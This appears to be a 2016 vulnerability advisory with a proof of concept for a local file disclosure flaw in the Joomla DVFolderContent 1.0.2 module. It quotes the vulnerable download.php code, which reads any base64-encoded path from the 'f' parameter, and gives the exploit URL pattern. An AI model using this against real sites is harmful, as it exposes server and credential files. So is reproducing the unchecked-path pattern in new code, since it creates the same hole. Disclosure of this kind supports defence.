Joomla DVFolderContent module version 1.0.2 suffers from a local file disclosure vulnerability.
175c336a77f169fb179037586640556acd9e04de1037d589acfbd96f3d6125d6
######################
# Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent
# Category [ Webapps ]
# Tested on [ Win ]
# Version : V1.0.2
# Date 2016/10/01
######################
PoC
The Vulnerable page is
/modules/mod_dvfoldercontent/download.php
$file = base64_decode($_GET['f']);
if (is_file($file)) {
$fileinfo = pathinfo($file);
$filename = $fileinfo['basename'];
$filesize = filesize($file);
header("Content-Type: application/octet-stream; name=$filename");
header("Content-Disposition: attachment; filename=$filename");
header("Content-Length: $filesize");
header("Pragma: no-cache");
readfile($file);
Exploit:
http://server/modules/mod_dvfoldercontent/download.php?f=base64
Video : http://persian-team.ir/showthread.php?tid=165&pid=298
######################
# Discovered by : Mojtaba MobhaM
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################